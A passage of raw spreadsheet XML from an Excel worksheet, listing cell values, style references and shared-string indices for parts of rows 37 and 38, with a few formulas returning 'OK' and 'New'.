      <c r="LF37" s="113">
        <v>0</v>
      </c>
      <c r="LG37" s="114">
        <v>0</v>
      </c>
      <c r="LH37" s="503">
        <v>0</v>
      </c>
      <c r="LI37" s="115">
        <v>0</v>
      </c>
      <c r="LJ37" s="115">
        <v>0</v>
      </c>
      <c r="LK37" s="116">
        <v>0</v>
      </c>
      <c r="LL37" s="117">
        <v>11</v>
      </c>
      <c r="LM37" s="507">
        <v>11</v>
      </c>
      <c r="LN37" s="119">
        <v>1</v>
      </c>
      <c r="LO37" s="119">
        <v>3</v>
      </c>
      <c r="LP37" s="119">
        <v>3</v>
      </c>
      <c r="LQ37" s="119">
        <v>2</v>
      </c>
      <c r="LR37" s="119">
        <v>3</v>
      </c>
      <c r="LS37" s="119">
        <v>3</v>
      </c>
      <c r="LT37" s="382"/>
      <c r="LU37" s="117">
        <v>0</v>
      </c>
      <c r="LV37" s="118">
        <v>0</v>
      </c>
      <c r="LW37" s="507">
        <v>0</v>
      </c>
      <c r="LX37" s="119">
        <v>0</v>
      </c>
      <c r="LY37" s="119">
        <v>0</v>
      </c>
      <c r="LZ37" s="119">
        <v>0</v>
      </c>
      <c r="MA37" s="117">
        <v>0</v>
      </c>
      <c r="MB37" s="118">
        <v>0</v>
      </c>
      <c r="MC37" s="507">
        <v>0</v>
      </c>
      <c r="MD37" s="119">
        <v>0</v>
      </c>
      <c r="ME37" s="119">
        <v>0</v>
      </c>
      <c r="MF37" s="119">
        <v>0</v>
      </c>
      <c r="MG37" s="117">
        <v>0</v>
      </c>
      <c r="MH37" s="118">
        <v>0</v>
      </c>
      <c r="MI37" s="507">
        <v>0</v>
      </c>
      <c r="MJ37" s="119">
        <v>0</v>
      </c>
      <c r="MK37" s="119">
        <v>0</v>
      </c>
      <c r="ML37" s="119">
        <v>0</v>
      </c>
      <c r="MM37" s="117">
        <v>2</v>
      </c>
      <c r="MN37" s="118" t="s">
        <v>4205</v>
      </c>
      <c r="MO37" s="507">
        <v>2</v>
      </c>
      <c r="MP37" s="119" t="s">
        <v>3061</v>
      </c>
      <c r="MQ37" s="119">
        <v>1</v>
      </c>
      <c r="MR37" s="119">
        <v>2</v>
      </c>
      <c r="MS37" s="117">
        <v>0</v>
      </c>
      <c r="MT37" s="118">
        <v>0</v>
      </c>
      <c r="MU37" s="507">
        <v>0</v>
      </c>
      <c r="MV37" s="119">
        <v>0</v>
      </c>
      <c r="MW37" s="119">
        <v>0</v>
      </c>
      <c r="MX37" s="119">
        <v>0</v>
      </c>
      <c r="MY37" s="117">
        <v>0</v>
      </c>
      <c r="MZ37" s="118">
        <v>0</v>
      </c>
      <c r="NA37" s="507">
        <v>0</v>
      </c>
      <c r="NB37" s="119">
        <v>0</v>
      </c>
      <c r="NC37" s="119">
        <v>0</v>
      </c>
      <c r="ND37" s="119">
        <v>0</v>
      </c>
      <c r="NE37" s="117">
        <v>3</v>
      </c>
      <c r="NF37" s="118" t="s">
        <v>4206</v>
      </c>
      <c r="NG37" s="507">
        <v>3</v>
      </c>
      <c r="NH37" s="119" t="s">
        <v>2538</v>
      </c>
      <c r="NI37" s="119">
        <v>1</v>
      </c>
      <c r="NJ37" s="119">
        <v>3</v>
      </c>
      <c r="NK37" s="117">
        <v>0</v>
      </c>
      <c r="NL37" s="118">
        <v>0</v>
      </c>
      <c r="NM37" s="507">
        <v>0</v>
      </c>
      <c r="NN37" s="119">
        <v>0</v>
      </c>
      <c r="NO37" s="119">
        <v>0</v>
      </c>
      <c r="NP37" s="119">
        <v>0</v>
      </c>
      <c r="NQ37" s="117">
        <v>0</v>
      </c>
      <c r="NR37" s="118">
        <v>0</v>
      </c>
      <c r="NS37" s="507">
        <v>0</v>
      </c>
      <c r="NT37" s="119">
        <v>0</v>
      </c>
      <c r="NU37" s="119">
        <v>0</v>
      </c>
      <c r="NV37" s="119">
        <v>0</v>
      </c>
      <c r="NW37" s="117">
        <v>6</v>
      </c>
      <c r="NX37" s="118" t="s">
        <v>4353</v>
      </c>
      <c r="NY37" s="507">
        <v>6</v>
      </c>
      <c r="NZ37" s="119" t="s">
        <v>4354</v>
      </c>
      <c r="OA37" s="119">
        <v>2</v>
      </c>
      <c r="OB37" s="119">
        <v>3</v>
      </c>
      <c r="OC37" s="120">
        <v>6</v>
      </c>
      <c r="OD37" s="120">
        <v>6</v>
      </c>
      <c r="OE37" s="120">
        <v>2</v>
      </c>
      <c r="OF37" s="121">
        <v>1</v>
      </c>
      <c r="OG37" s="120">
        <v>3</v>
      </c>
      <c r="OH37" s="120">
        <v>3</v>
      </c>
      <c r="OI37" s="120">
        <v>3</v>
      </c>
      <c r="OJ37" s="120">
        <v>3</v>
      </c>
      <c r="OK37" s="383"/>
      <c r="OL37" s="120">
        <v>6</v>
      </c>
      <c r="OM37" s="120">
        <v>6</v>
      </c>
      <c r="ON37" s="120">
        <v>6</v>
      </c>
      <c r="OO37" s="120" t="s">
        <v>3062</v>
      </c>
      <c r="OP37" s="120">
        <v>2</v>
      </c>
      <c r="OQ37" s="464">
        <v>3</v>
      </c>
      <c r="OR37" s="120">
        <v>0</v>
      </c>
      <c r="OS37" s="120">
        <v>0</v>
      </c>
      <c r="OT37" s="120">
        <v>0</v>
      </c>
      <c r="OU37" s="120"/>
      <c r="OV37" s="120">
        <v>0</v>
      </c>
      <c r="OW37" s="464">
        <v>0</v>
      </c>
      <c r="OX37" s="120">
        <v>0</v>
      </c>
      <c r="OY37" s="120">
        <v>0</v>
      </c>
      <c r="OZ37" s="120">
        <v>0</v>
      </c>
      <c r="PA37" s="120"/>
      <c r="PB37" s="120">
        <v>0</v>
      </c>
      <c r="PC37" s="464">
        <v>0</v>
      </c>
      <c r="PD37" s="120">
        <v>0</v>
      </c>
      <c r="PE37" s="120">
        <v>0</v>
      </c>
      <c r="PF37" s="120">
        <v>0</v>
      </c>
      <c r="PG37" s="120"/>
      <c r="PH37" s="120">
        <v>0</v>
      </c>
      <c r="PI37" s="464">
        <v>0</v>
      </c>
      <c r="PJ37" s="120">
        <v>0</v>
      </c>
      <c r="PK37" s="120">
        <v>0</v>
      </c>
      <c r="PL37" s="120">
        <v>0</v>
      </c>
      <c r="PM37" s="120"/>
      <c r="PN37" s="120">
        <v>0</v>
      </c>
      <c r="PO37" s="464">
        <v>0</v>
      </c>
      <c r="PP37" s="120">
        <v>0</v>
      </c>
      <c r="PQ37" s="120">
        <v>0</v>
      </c>
      <c r="PR37" s="120">
        <v>0</v>
      </c>
      <c r="PS37" s="120"/>
      <c r="PT37" s="120">
        <v>0</v>
      </c>
      <c r="PU37" s="464">
        <v>0</v>
      </c>
      <c r="PV37" s="120">
        <v>0</v>
      </c>
      <c r="PW37" s="120">
        <v>0</v>
      </c>
      <c r="PX37" s="120">
        <v>0</v>
      </c>
      <c r="PY37" s="120"/>
      <c r="PZ37" s="120">
        <v>0</v>
      </c>
      <c r="QA37" s="464">
        <v>0</v>
      </c>
      <c r="QB37" s="120">
        <v>6</v>
      </c>
      <c r="QC37" s="120">
        <v>6</v>
      </c>
      <c r="QD37" s="120">
        <v>3</v>
      </c>
      <c r="QE37" s="120" t="s">
        <v>3063</v>
      </c>
      <c r="QF37" s="120">
        <v>1</v>
      </c>
      <c r="QG37" s="464">
        <v>3</v>
      </c>
      <c r="QH37" s="120">
        <v>0</v>
      </c>
      <c r="QI37" s="120">
        <v>0</v>
      </c>
      <c r="QJ37" s="120">
        <v>0</v>
      </c>
      <c r="QK37" s="120"/>
      <c r="QL37" s="120">
        <v>0</v>
      </c>
      <c r="QM37" s="464">
        <v>0</v>
      </c>
      <c r="QN37" s="120">
        <v>0</v>
      </c>
      <c r="QO37" s="120">
        <v>0</v>
      </c>
      <c r="QP37" s="120">
        <v>0</v>
      </c>
      <c r="QQ37" s="120"/>
      <c r="QR37" s="120">
        <v>0</v>
      </c>
      <c r="QS37" s="464">
        <v>0</v>
      </c>
      <c r="QT37" s="184"/>
      <c r="QU37" s="184"/>
      <c r="QV37" s="184"/>
      <c r="QW37" s="184"/>
      <c r="QX37" s="184"/>
      <c r="QY37" s="184"/>
      <c r="QZ37" s="184"/>
      <c r="RA37" s="184"/>
      <c r="RB37" s="184"/>
      <c r="RC37" s="184"/>
      <c r="RD37" s="184"/>
      <c r="RE37" s="184"/>
      <c r="RF37" s="184"/>
      <c r="RG37" s="184"/>
      <c r="RH37" s="184"/>
      <c r="RI37" s="184"/>
      <c r="RJ37" s="184"/>
      <c r="RK37" s="184"/>
      <c r="RL37" s="184"/>
      <c r="RM37" s="184"/>
      <c r="RN37" s="184"/>
      <c r="RO37" s="184"/>
      <c r="RP37" s="184"/>
      <c r="RQ37" s="184"/>
      <c r="RR37" s="184"/>
      <c r="RS37" s="184"/>
      <c r="RT37" s="184"/>
      <c r="RU37" s="184"/>
      <c r="RV37" s="184"/>
      <c r="RW37" s="184"/>
      <c r="RX37" s="184"/>
      <c r="RY37" s="184"/>
      <c r="RZ37" s="184"/>
      <c r="SA37" s="184"/>
      <c r="SB37" s="184"/>
      <c r="SC37" s="184"/>
      <c r="SD37" s="184"/>
      <c r="SE37" s="184"/>
      <c r="SF37" s="184"/>
      <c r="SG37" s="184"/>
      <c r="SH37" s="184"/>
      <c r="SI37" s="184"/>
      <c r="SJ37" s="184"/>
      <c r="SK37" s="184"/>
      <c r="SL37" s="184"/>
      <c r="SM37" s="184"/>
      <c r="SN37" s="184"/>
      <c r="SO37" s="184"/>
      <c r="SP37" s="184"/>
      <c r="SQ37" s="184"/>
      <c r="SR37" s="184"/>
      <c r="SS37" s="184"/>
      <c r="ST37" s="184"/>
      <c r="SU37" s="184"/>
      <c r="SV37" s="184"/>
      <c r="SW37" s="184"/>
      <c r="SX37" s="184"/>
      <c r="SY37" s="184"/>
      <c r="SZ37" s="184"/>
      <c r="TA37" s="184"/>
      <c r="TB37" s="184"/>
      <c r="TC37" s="184"/>
      <c r="TD37" s="184"/>
      <c r="TE37" s="184"/>
      <c r="TF37" s="184"/>
      <c r="TG37" s="184"/>
      <c r="TH37" s="184"/>
      <c r="TI37" s="184"/>
      <c r="TJ37" s="184"/>
      <c r="TK37" s="184"/>
      <c r="TL37" s="184"/>
      <c r="TM37" s="184"/>
      <c r="TN37" s="184"/>
      <c r="TO37" s="184"/>
      <c r="TP37" s="184"/>
      <c r="TQ37" s="184"/>
      <c r="TR37" s="184"/>
      <c r="TS37" s="184"/>
      <c r="TT37" s="184"/>
      <c r="TU37" s="184"/>
      <c r="TV37" s="184"/>
      <c r="TW37" s="184"/>
      <c r="TX37" s="184"/>
      <c r="TY37" s="184"/>
      <c r="TZ37" s="184"/>
      <c r="UA37" s="184"/>
      <c r="UB37" s="184"/>
      <c r="UC37" s="184"/>
      <c r="UD37" s="184"/>
      <c r="UE37" s="184"/>
      <c r="UF37" s="184"/>
      <c r="UG37" s="184"/>
      <c r="UH37" s="184"/>
      <c r="UI37" s="184"/>
      <c r="UJ37" s="184"/>
      <c r="UK37" s="184"/>
      <c r="UL37" s="184"/>
      <c r="UM37" s="184"/>
      <c r="UN37" s="184"/>
      <c r="UO37" s="184"/>
      <c r="UP37" s="184"/>
      <c r="UQ37" s="184"/>
      <c r="UR37" s="184"/>
      <c r="US37" s="184"/>
      <c r="UT37" s="184"/>
      <c r="UU37" s="184"/>
      <c r="UV37" s="184"/>
      <c r="UW37" s="184"/>
      <c r="UX37" s="184"/>
      <c r="UY37" s="184"/>
      <c r="UZ37" s="184"/>
      <c r="VA37" s="184"/>
      <c r="VB37" s="184"/>
      <c r="VC37" s="184"/>
      <c r="VD37" s="184"/>
      <c r="VE37" s="184"/>
      <c r="VF37" s="184"/>
      <c r="VG37" s="184"/>
      <c r="VH37" s="184"/>
      <c r="VI37" s="184"/>
      <c r="VJ37" s="184"/>
      <c r="VK37" s="184"/>
      <c r="VL37" s="184"/>
      <c r="VM37" s="184"/>
      <c r="VN37" s="184"/>
      <c r="VO37" s="184"/>
      <c r="VP37" s="184"/>
      <c r="VQ37" s="184"/>
      <c r="VR37" s="184"/>
      <c r="VS37" s="184"/>
      <c r="VT37" s="184"/>
      <c r="VU37" s="184"/>
      <c r="VV37" s="184"/>
      <c r="VW37" s="184"/>
      <c r="VX37" s="184"/>
      <c r="VY37" s="184"/>
    </row>
    <row r="38" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A38" s="82" t="s">
        <v>72</v>
      </c>
      <c r="B38" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C38" s="83" t="s">
        <v>437</v>
      </c>
      <c r="D38" s="83" t="s">
        <v>78</v>
      </c>
      <c r="E38" s="83">
        <f t="shared" si="2"/>
        <v>31</v>
      </c>
      <c r="F38" s="83" t="s">
        <v>79</v>
      </c>
      <c r="G38" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H38" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I38" s="81" t="s">
        <v>1099</v>
      </c>
      <c r="J38" s="85" t="s">
        <v>827</v>
      </c>
      <c r="K38" s="81" t="s">
        <v>1100</v>
      </c>
      <c r="L38" s="81" t="s">
        <v>1101</v>
      </c>
      <c r="M38" s="378" t="s">
        <v>212</v>
      </c>
      <c r="N38" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O38" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P38" s="91"/>
      <c r="Q38" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R38" s="92" t="s">
        <v>1102</v>
      </c>
      <c r="S38" s="93" t="s">
        <v>749</v>
      </c>
      <c r="T38" s="92" t="s">
        <v>1103</v>
      </c>
      <c r="U38" s="94" t="s">
        <v>1104</v>
      </c>
      <c r="V38" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W38" s="96" t="s">
        <v>1105</v>
      </c>
      <c r="X38" s="97" t="s">
        <v>1106</v>
      </c>
      <c r="Y38" s="83" t="s">
        <v>1107</v>
      </c>
      <c r="Z38" s="98" t="s">
        <v>1108</v>
      </c>
      <c r="AA38" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB38" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC38" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD38" s="83"/>
      <c r="AE38" s="83"/>
      <c r="AF38" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG38" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH38" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI38" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ38" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK38" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL38" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM38" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN38" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO38" s="356" t="s">
        <v>747</v>
      </c>
      <c r="AP38" s="357" t="s">
        <v>745</v>
      </c>
      <c r="AQ38" s="358">
        <v>4</v>
      </c>
      <c r="AR38" s="100"/>
      <c r="AS38" s="100">
        <v>3</v>
      </c>
      <c r="AT38" s="100">
        <v>0</v>
      </c>
      <c r="AU38" s="100">
        <v>3</v>
      </c>
      <c r="AV38" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW38" s="100">
        <v>3</v>
      </c>
      <c r="AX38" s="100">
        <v>3</v>
      </c>
      <c r="AY38" s="100">
        <v>0</v>
      </c>
      <c r="AZ38" s="100">
        <v>3</v>
      </c>
      <c r="BA38" s="381"/>
      <c r="BB38" s="101">
        <v>4</v>
      </c>
      <c r="BC38" s="102" t="s">
        <v>1806</v>
      </c>
      <c r="BD38" s="102">
        <v>3</v>
      </c>
      <c r="BE38" s="103" t="s">
        <v>341</v>
      </c>
      <c r="BF38" s="103">
        <v>1</v>
      </c>
      <c r="BG38" s="104">
        <v>3</v>
      </c>
      <c r="BH38" s="105">
        <v>0</v>
      </c>
      <c r="BI38" s="106">
        <v>0</v>
      </c>
      <c r="BJ38" s="497">
        <v>0</v>
      </c>
      <c r="BK38" s="107">
        <v>0</v>
      </c>
      <c r="BL38" s="107">
        <v>0</v>
      </c>
      <c r="BM38" s="108">
        <v>0</v>
      </c>
      <c r="BN38" s="109">
        <v>4</v>
      </c>
      <c r="BO38" s="110" t="s">
        <v>1806</v>
      </c>
      <c r="BP38" s="501">
        <v>3</v>
      </c>
      <c r="BQ38" s="111" t="s">
        <v>341</v>
      </c>
      <c r="BR38" s="111">
        <v>1</v>
      </c>
      <c r="BS38" s="112">
        <v>3</v>
      </c>
      <c r="BT38" s="113">
        <v>543</v>
      </c>
      <c r="BU38" s="114" t="s">
        <v>3066</v>
      </c>
      <c r="BV38" s="503">
        <v>10</v>
      </c>
      <c r="BW38" s="115" t="s">
        <v>3067</v>
      </c>
      <c r="BX38" s="115">
        <v>4</v>
      </c>
      <c r="BY38" s="116">
        <v>4</v>
      </c>
      <c r="BZ38" s="250">
        <v>5</v>
      </c>
      <c r="CA38" s="251" t="s">
        <v>3068</v>
      </c>
      <c r="CB38" s="505">
        <v>3</v>
      </c>
      <c r="CC38" s="252" t="s">
        <v>3069</v>
      </c>
      <c r="CD38" s="252">
        <v>3</v>
      </c>
      <c r="CE38" s="253">
        <v>1</v>
      </c>
      <c r="CF38" s="101">
        <v>548</v>
      </c>
      <c r="CG38" s="102" t="s">
        <v>3070</v>
      </c>
      <c r="CH38" s="102">
        <v>13</v>
      </c>
      <c r="CI38" s="103" t="s">
        <v>3071</v>
      </c>
      <c r="CJ38" s="103">
        <v>7</v>
      </c>
      <c r="CK38" s="104">
        <v>4</v>
      </c>
      <c r="CL38" s="105">
        <v>0</v>
      </c>
      <c r="CM38" s="106">
        <v>0</v>
      </c>
      <c r="CN38" s="497">
        <v>0</v>
      </c>
      <c r="CO38" s="107">
        <v>0</v>
      </c>
      <c r="CP38" s="107">
        <v>0</v>
      </c>
      <c r="CQ38" s="108">
        <v>0</v>
      </c>
      <c r="CR38" s="109">
        <v>4</v>
      </c>
      <c r="CS38" s="110" t="s">
        <v>1942</v>
      </c>
      <c r="CT38" s="501">
        <v>1</v>
      </c>
      <c r="CU38" s="111" t="s">
        <v>1933</v>
      </c>
      <c r="CV38" s="111">
        <v>1</v>
      </c>
      <c r="CW38" s="112">
        <v>1</v>
      </c>
      <c r="CX38" s="113">
        <v>8</v>
      </c>
      <c r="CY38" s="114" t="s">
        <v>2149</v>
      </c>
      <c r="CZ38" s="503">
        <v>4</v>
      </c>
      <c r="DA38" s="115" t="s">
        <v>2150</v>
      </c>
      <c r="DB38" s="115">
        <v>2</v>
      </c>
      <c r="DC38" s="116">
        <v>4</v>
      </c>
      <c r="DD38" s="101">
        <v>0</v>
      </c>
      <c r="DE38" s="102">
        <v>0</v>
      </c>
      <c r="DF38" s="102">
        <v>0</v>
      </c>
      <c r="DG38" s="103">
        <v>0</v>
      </c>
      <c r="DH38" s="103">
        <v>0</v>
      </c>
      <c r="DI38" s="104">
        <v>0</v>
      </c>
      <c r="DJ38" s="105">
        <v>0</v>
      </c>
      <c r="DK38" s="106">
        <v>0</v>
      </c>
      <c r="DL38" s="497">
        <v>0</v>
      </c>
      <c r="DM38" s="107">
        <v>0</v>
      </c>
      <c r="DN38" s="107">
        <v>0</v>
      </c>
      <c r="DO38" s="108">
        <v>0</v>
      </c>
      <c r="DP38" s="109">
        <v>0</v>
      </c>
      <c r="DQ38" s="110">
        <v>0</v>
      </c>
      <c r="DR38" s="501">
        <v>0</v>
      </c>
      <c r="DS38" s="111">
        <v>0</v>
      </c>
      <c r="DT38" s="111">
        <v>0</v>
      </c>
      <c r="DU38" s="112">
        <v>0</v>
      </c>
      <c r="DV38" s="113">
        <v>535</v>
      </c>
      <c r="DW38" s="114" t="s">
        <v>3072</v>
      </c>
      <c r="DX38" s="503">
        <v>6</v>
      </c>
      <c r="DY38" s="115" t="s">
        <v>3073</v>
      </c>
      <c r="DZ38" s="115">
        <v>2</v>
      </c>
      <c r="EA38" s="116">
        <v>3</v>
      </c>
      <c r="EB38" s="250">
        <v>0</v>
      </c>
      <c r="EC38" s="251">
        <v>0</v>
      </c>
      <c r="ED38" s="505">
        <v>0</v>
      </c>
      <c r="EE38" s="252">
        <v>0</v>
      </c>
      <c r="EF38" s="252">
        <v>0</v>
      </c>
      <c r="EG38" s="253">
        <v>0</v>
      </c>
      <c r="EH38" s="101">
        <v>535</v>
      </c>
      <c r="EI38" s="102" t="s">
        <v>3072</v>
      </c>
      <c r="EJ38" s="102">
        <v>6</v>
      </c>
      <c r="EK38" s="103" t="s">
        <v>3073</v>
      </c>
      <c r="EL38" s="103">
        <v>2</v>
      </c>
      <c r="EM38" s="104">
        <v>3</v>
      </c>
      <c r="EN38" s="105">
        <v>0</v>
      </c>
      <c r="EO38" s="106">
        <v>0</v>
      </c>
      <c r="EP38" s="497">
        <v>0</v>
      </c>
      <c r="EQ38" s="107">
        <v>0</v>
      </c>
      <c r="ER38" s="107">
        <v>0</v>
      </c>
      <c r="ES38" s="108">
        <v>0</v>
      </c>
      <c r="ET38" s="109">
        <v>0</v>
      </c>
      <c r="EU38" s="110">
        <v>0</v>
      </c>
      <c r="EV38" s="501">
        <v>0</v>
      </c>
      <c r="EW38" s="111">
        <v>0</v>
      </c>
      <c r="EX38" s="111">
        <v>0</v>
      </c>
      <c r="EY38" s="112">
        <v>0</v>
      </c>
      <c r="EZ38" s="113">
        <v>0</v>
      </c>
      <c r="FA38" s="114">
        <v>0</v>
      </c>
      <c r="FB38" s="503">
        <v>0</v>
      </c>
      <c r="FC38" s="115">
        <v>0</v>
      </c>
      <c r="FD38" s="115">
        <v>0</v>
      </c>
      <c r="FE38" s="116">
        <v>0</v>
      </c>
      <c r="FF38" s="101">
        <v>4</v>
      </c>
      <c r="FG38" s="102" t="s">
        <v>1806</v>
      </c>
      <c r="FH38" s="102">
        <v>3</v>
      </c>
      <c r="FI38" s="103" t="s">
        <v>341</v>
      </c>
      <c r="FJ38" s="103">
        <v>1</v>
      </c>
      <c r="FK38" s="104">
        <v>3</v>
      </c>
      <c r="FL38" s="105">
        <v>0</v>
      </c>
      <c r="FM38" s="106">
        <v>0</v>
      </c>
      <c r="FN38" s="497">
        <v>0</v>
      </c>
      <c r="FO38" s="107">
        <v>0</v>
      </c>
      <c r="FP38" s="107">
        <v>0</v>
      </c>
      <c r="FQ38" s="108">
        <v>0</v>
      </c>
      <c r="FR38" s="109">
        <v>4</v>
      </c>
      <c r="FS38" s="110" t="s">
        <v>1806</v>
      </c>
      <c r="FT38" s="501">
        <v>3</v>
      </c>
      <c r="FU38" s="111" t="s">
        <v>341</v>
      </c>
      <c r="FV38" s="111">
        <v>1</v>
      </c>
      <c r="FW38" s="112">
        <v>3</v>
      </c>
      <c r="FX38" s="113">
        <v>4</v>
      </c>
      <c r="FY38" s="114" t="s">
        <v>1806</v>
      </c>
      <c r="FZ38" s="503">
        <v>3</v>
      </c>
      <c r="GA38" s="115" t="s">
        <v>341</v>
      </c>
      <c r="GB38" s="115">
        <v>1</v>
      </c>
      <c r="GC38" s="116">
        <v>3</v>
      </c>
      <c r="GD38" s="250">
        <v>4</v>
      </c>
      <c r="GE38" s="251" t="s">
        <v>1902</v>
      </c>
      <c r="GF38" s="505">
        <v>2</v>
      </c>
      <c r="GG38" s="252" t="s">
        <v>1903</v>
      </c>
      <c r="GH38" s="252">
        <v>2</v>
      </c>
      <c r="GI38" s="253">
        <v>1</v>
      </c>
      <c r="GJ38" s="101">
        <v>8</v>
      </c>
      <c r="GK38" s="102" t="s">
        <v>3074</v>
      </c>
      <c r="GL38" s="102">
        <v>5</v>
      </c>
      <c r="GM38" s="103" t="s">
        <v>3075</v>
      </c>
      <c r="GN38" s="103">
        <v>3</v>
      </c>
      <c r="GO38" s="104">
        <v>3</v>
      </c>
      <c r="GP38" s="105">
        <v>0</v>
      </c>
      <c r="GQ38" s="106">
        <v>0</v>
      </c>
      <c r="GR38" s="497">
        <v>0</v>
      </c>
      <c r="GS38" s="107">
        <v>0</v>
      </c>
      <c r="GT38" s="107">
        <v>0</v>
      </c>
      <c r="GU38" s="108">
        <v>0</v>
      </c>
      <c r="GV38" s="109">
        <v>0</v>
      </c>
      <c r="GW38" s="110">
        <v>0</v>
      </c>
      <c r="GX38" s="501">
        <v>0</v>
      </c>
      <c r="GY38" s="111">
        <v>0</v>
      </c>
      <c r="GZ38" s="111">
        <v>0</v>
      </c>
      <c r="HA38" s="112">
        <v>0</v>
      </c>
      <c r="HB38" s="113">
        <v>4</v>
      </c>
      <c r="HC38" s="114" t="s">
        <v>1806</v>
      </c>
      <c r="HD38" s="503">
        <v>3</v>
      </c>
      <c r="HE38" s="115" t="s">
        <v>341</v>
      </c>
      <c r="HF38" s="115">
        <v>1</v>
      </c>
      <c r="HG38" s="116">
        <v>3</v>
      </c>
      <c r="HH38" s="101">
        <v>0</v>
      </c>
      <c r="HI38" s="102">
        <v>0</v>
      </c>
      <c r="HJ38" s="102">
        <v>0</v>
      </c>
      <c r="HK38" s="103">
        <v>0</v>
      </c>
      <c r="HL38" s="103">
        <v>0</v>
      </c>
      <c r="HM38" s="104">
        <v>0</v>
      </c>
      <c r="HN38" s="105">
        <v>0</v>
      </c>
      <c r="HO38" s="106">
        <v>0</v>
      </c>
      <c r="HP38" s="497">
        <v>0</v>
      </c>
      <c r="HQ38" s="107">
        <v>0</v>
      </c>
      <c r="HR38" s="107">
        <v>0</v>
      </c>
      <c r="HS38" s="108">
        <v>0</v>
      </c>
      <c r="HT38" s="109">
        <v>0</v>
      </c>
      <c r="HU38" s="110">
        <v>0</v>
      </c>
      <c r="HV38" s="501">
        <v>0</v>
      </c>
      <c r="HW38" s="111">
        <v>0</v>
      </c>
      <c r="HX38" s="111">
        <v>0</v>
      </c>
      <c r="HY38" s="112">
        <v>0</v>
      </c>
      <c r="HZ38" s="113">
        <v>4</v>
      </c>
      <c r="IA38" s="114" t="s">
        <v>1942</v>
      </c>
      <c r="IB38" s="503">
        <v>1</v>
      </c>
      <c r="IC38" s="115" t="s">
        <v>1933</v>
      </c>
      <c r="ID38" s="115">
        <v>1</v>
      </c>
      <c r="IE38" s="116">
        <v>1</v>
      </c>
      <c r="IF38" s="250">
        <v>1</v>
      </c>
      <c r="IG38" s="251" t="s">
        <v>3076</v>
      </c>
      <c r="IH38" s="505">
        <v>1</v>
      </c>
      <c r="II38" s="252" t="s">
        <v>3077</v>
      </c>
      <c r="IJ38" s="252">
        <v>1</v>
      </c>
      <c r="IK38" s="253">
        <v>1</v>
      </c>
      <c r="IL38" s="101">
        <v>5</v>
      </c>
      <c r="IM38" s="102" t="s">
        <v>3078</v>
      </c>
      <c r="IN38" s="102">
        <v>2</v>
      </c>
      <c r="IO38" s="103" t="s">
        <v>3079</v>
      </c>
      <c r="IP38" s="103">
        <v>2</v>
      </c>
      <c r="IQ38" s="104">
        <v>2</v>
      </c>
      <c r="IR38" s="105">
        <v>0</v>
      </c>
      <c r="IS38" s="106">
        <v>0</v>
      </c>
      <c r="IT38" s="497">
        <v>0</v>
      </c>
      <c r="IU38" s="107">
        <v>0</v>
      </c>
      <c r="IV38" s="107">
        <v>0</v>
      </c>
      <c r="IW38" s="108">
        <v>0</v>
      </c>
      <c r="IX38" s="109">
        <v>4</v>
      </c>
      <c r="IY38" s="110" t="s">
        <v>1942</v>
      </c>
      <c r="IZ38" s="501">
        <v>1</v>
      </c>
      <c r="JA38" s="111" t="s">
        <v>1933</v>
      </c>
      <c r="JB38" s="111">
        <v>1</v>
      </c>
      <c r="JC38" s="112">
        <v>1</v>
      </c>
      <c r="JD38" s="113">
        <v>4</v>
      </c>
      <c r="JE38" s="114" t="s">
        <v>1942</v>
      </c>
      <c r="JF38" s="503">
        <v>1</v>
      </c>
      <c r="JG38" s="115" t="s">
        <v>1933</v>
      </c>
      <c r="JH38" s="115">
        <v>1</v>
      </c>
      <c r="JI38" s="116">
        <v>1</v>
      </c>
      <c r="JJ38" s="101">
        <v>0</v>
      </c>
      <c r="JK38" s="102">
        <v>0</v>
      </c>
      <c r="JL38" s="102">
        <v>0</v>
      </c>
      <c r="JM38" s="103">
        <v>0</v>
      </c>
      <c r="JN38" s="103">
        <v>0</v>
      </c>
      <c r="JO38" s="104">
        <v>0</v>
      </c>
      <c r="JP38" s="105">
        <v>0</v>
      </c>
      <c r="JQ38" s="106">
        <v>0</v>
      </c>
      <c r="JR38" s="497">
        <v>0</v>
      </c>
      <c r="JS38" s="107">
        <v>0</v>
      </c>
      <c r="JT38" s="107">
        <v>0</v>
      </c>
      <c r="JU38" s="108">
        <v>0</v>
      </c>
      <c r="JV38" s="109">
        <v>0</v>
      </c>
      <c r="JW38" s="110">
        <v>0</v>
      </c>
      <c r="JX38" s="501">
        <v>0</v>
      </c>
      <c r="JY38" s="111">
        <v>0</v>
      </c>
      <c r="JZ38" s="111">
        <v>0</v>
      </c>
      <c r="KA38" s="112">
        <v>0</v>
      </c>
      <c r="KB38" s="113">
        <v>0</v>
      </c>
      <c r="KC38" s="114">
        <v>0</v>
      </c>
      <c r="KD38" s="503">
        <v>0</v>
      </c>
      <c r="KE38" s="115">
        <v>0</v>
      </c>
      <c r="KF38" s="115">
        <v>0</v>
      </c>
      <c r="KG38" s="116">
        <v>0</v>
      </c>
      <c r="KH38" s="250">
        <v>0</v>
      </c>
      <c r="KI38" s="251">
        <v>0</v>
      </c>
      <c r="KJ38" s="505">
        <v>0</v>
      </c>
      <c r="KK38" s="252">
        <v>0</v>
      </c>
      <c r="KL38" s="252">
        <v>0</v>
      </c>
      <c r="KM38" s="253">
        <v>0</v>
      </c>
      <c r="KN38" s="101">
        <v>0</v>
      </c>
      <c r="KO38" s="102">
        <v>0</v>
      </c>
      <c r="KP38" s="102">
